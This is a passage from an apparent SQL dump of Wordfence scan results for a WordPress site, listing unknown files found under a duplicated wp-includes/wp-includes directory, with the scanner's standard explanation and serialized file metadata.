WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/411.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26538,1631424850,1631424850,'new','knownfile',75,'5472b7abee7a6994f680b78b84ab3d8d','4006d421948ee1d0b7066cfc3341cecd','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/412.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/412.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26539,1631424851,1631424851,'new','knownfile',75,'634f8be8351981066277e9cbde375685','78ad09f17a651310740e75f843ad2334','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/413.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/413.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26540,1631424851,1631424851,'new','knownfile',75,'0e858d262273b0f66ce66da904ae16dc','164f14e69998d5e22ac94343dcda2c89','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/414.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/414.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26541,1631424851,1631424851,'new','knownfile',75,'1d3cfbc8670f41f9db8a7ec79cebbda5','d7deccb00aa65d8dd921601b4bd1808c','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/415.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/415.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26542,1631424851,1631424851,'new','knownfile',75,'71d28f180cf3255ffb8e418742a3bc49','808d5fb817953a55be1bd9ef6b0a8ed3','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/416.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/416.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26543,1631424851,1631424851,'new','knownfile',75,'e879c8996120a39804e48f8a7af946b2','21aa2a6f2717f4c124ffa2ec669a0a91','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/417.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/417.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26544,1631424851,1631424851,'new','knownfile',75,'9e63f337b459877d77739c104fea18de','ab875841dcf92a2d78c10312bbd4b590','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/418.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/418.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26545,1631424852,1631424852,'new','knownfile',75,'1070d5557e6cafac795f1415acaa049a','e153eae567233da78018e16aad68a343','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/428.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/428.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26546,1631424852,1631424852,'new','knownfile',75,'3186b4f14b3ce8d599f1f181df63421f','fcfa179158ebadc7dda55a091748d641','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/429.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/429.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26547,1631424852,1631424852,'new','knownfile',75,'d9d01167f82184eda2bbaadf831ead1d','f42016e35f57ebabcad3d926ccecc2da','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/431.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/431.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26548,1631424852,1631424852,'new','knownfile',75,'3868326b3d3add86158888d5d7f00abc','1c729118c7dc30d01bd8044ac49d0a6a','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/500.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/500.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26549,1631424852,1631424852,'new','knownfile',75,'3f9f7d66b66332a2fc25e5ee3c48206e','5ab2013f4f432705f0b2add4e83a67c4','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/501.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/501.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26550,1631424852,1631424852,'new','knownfile',75,'e87ce5c2adda30b7402657098a4df8f6','a8e279e2d177bd6c147e1d5d01011143','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/502.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/502.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26551,1631424852,1631424852,'new','knownfile',75,'6c50465f250ea4f3a780b5ab9725dd90','13b02736dd0e550e8626c230934ef251','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/503.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/503.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26552,1631424852,1631424852,'new','knownfile',75,'be5b672597c76a05305236a6b5015c1f','de7334f4e3da3b50268f3438328ad243','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/504.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/504.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26553,1631424853,1631424853,'new','knownfile',75,'cd09a49d7ebf0cf0da34674b02417c77','7b06a0dcd8202d41e510053c4b8f6814','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/505.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/505.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26554,1631424853,1631424853,'new','knownfile',75,'6a4081aefcda0f5cc24b9df9a19e257d','699f8e34536913da1a44ce066f6162c7','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/511.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/511.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26555,1631424853,1631424853,'new','knownfile',75,'ed480a16c91ac3de915ed34c8b6c8da7','5cd60e318cf787b064252e943f3ae189','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/Unknown.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/Requests/Exception/HTTP/Unknown.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26556,1631424853,1631424853,'new','knownfile',75,'070ff4dc9052b9ffb2aafab51ad72a93','77d1738831f51cc08170b6f32bcf95b2','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/Requests/Exception/HTTP.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26557,1631424853,1631424853,'new','knownfile',75,'9d69308d83e39859178a58f3b37ad5e2','5e43dd34b05bcdad13f0c0478f2ed4c0','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/Transport/cURL.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/Requests/Exception/Transport/cURL.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26558,1631424853,1631424853,'new','knownfile',75,'a9a0b65835a140e31912b2dde0b17e2e','fe19e2a5ca88c3158b7dcffbe7233566','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/Transport.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/Requests/Exception/Transport.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26559,1631424853,1631424853,'new','knownfile',75,'7f89d633e234836857784a3ad6e847a9','ead042d53f28346332fcd0af04a646f5','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/Requests/Exception.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26560,1631424854,1631424854,'new','knownfile',75,'e9d9cdcc307f4d131e9cee4285b3a772','e9ee5b82919f29507647b0158030afb3','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Hooker.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/Requests/Hooker.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26561,1631424854,1631424854,'new','knownfile',75,'677552f150d461dc34dfce7ba5228d70','1370de52264fb2a746a2c8869a62ef21','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Hooks.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/Requests/Hooks.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26562,1631424854,1631424854,'new','knownfile',75,'94531c3a5744a6bfbb49b1970367f79c','beef5feea8837cde7d667085fed1d6bb','Unknown file in WordPress core: wp-includes/wp-includes/Requests/IDNAEncoder.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/Requests/IDNAEncoder.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26563,1631424854,1631424854,'new','knownfile',75,'a2eca4164f7ecd37cac65dddb4160383','4c800400613773f1c22044feac6509ae','Unknown file in WordPress core: wp-includes/wp-includes/Requests/IPv6.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/Requests/IPv6.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26564,1631424854,1631424854,'new','knownfile',75,'e55182164c460c76c273640ec4d08ba2','9517fcafa0f02fea210c8a9ef202d718','Unknown file in WordPress core: wp-includes/wp-includes/Requests/IRI.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/Requests/IRI.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26565,1631424854,1631424854,'new','knownfile',75,'184c7011b79c6322fae1cdad2838bc54','867bded4d637ee40bd416fd002dbc569','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Proxy/HTTP.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/Requests/Proxy/HTTP.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26566,1631424854,1631424854,'new','knownfile',75,'31c6c464d7122689f9fba2cd1ba2c081','43f3426f81b8c22f5e90ff8f2dec2ab0','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Proxy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/Requests/Proxy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26567,1631424854,1631424854,'new','knownfile',75,'497be5cdacada5c0c83de395af2362f7','76307eb98ae8cf38a611d3bc9dc1b070','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Response/Headers.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/Requests/Response/Headers.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26568,1631424854,1631424854,'new','knownfile',75,'c715315caf5b080b891d2451bf70f344','a0aea1ea2cff278da77fed5049077571','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/Requests/Response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26569,1631424854,1631424854,'new','knownfile',75,'3ac60fd945ba48fc33f692aaf9bbe3ff','0c00899b148383fbfdd3775b155d49b0','Unknown file in WordPress core: wp-includes/wp-includes/Requests/SSL.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/Requests/SSL.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26570,1631424854,1631424854,'new','knownfile',75,'6dbc673f2b55742e57ca302948647217','fc0b6c6288ec20582e6a02fae050c927','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Session.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/Requests/Session.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26571,1631424855,1631424855,'new','knownfile',75,'7cf764a1539eed73f91190ddebc7b342','40c015be4d8ac8444997c37a5ae7062e','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Transport/cURL.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/Requests/Transport/cURL.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26572,1631424855,1631424855,'new','knownfile',75,'d167e19414a675159fa4f1a9eb56cd87','1d3b5eac537e71755f78ff45b1006146','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Transport/fsockopen.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/Requests/Transport/fsockopen.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26573,1631424855,1631424855,'new','knownfile',75,'2669bf274ceeb8ee757d0dcd03b76b17','adcbc7c278cad25bb50e174b7d56cd1c','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Transport.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/Requests/Transport.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26574,1631424855,1631424855,'new','knownfile',75,'f8d4fd848215e2433ea89b68c5e2ac0f','4132cf45f4bd1334ca300f0db89f5e64','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Utility/CaseInsensitiveDictionary.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/Requests/Utility/CaseInsensitiveDictionary.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26575,1631424855,1631424855,'new','knownfile',75,'529f1f94c87717786deb2c199fc75aab','2129dfd59748f94af1b6eccd68de18d0','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Utility/FilteredIterator.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/Requests/Utility/FilteredIterator.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26576,1631424855,1631424855,'new','knownfile',75,'5417828d77787c71c54d44524713b31b','9fe2dba15eff3e0e654cdd1caf1c0b9e','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Author.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Author.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26577,1631424855,1631424855,'new','knownfile',75,'bba7c78c60af0f910edf1154da216f24','0a96e3d9e1b99b5d47894b34321ac1c9','Unknown file in WordPress core: 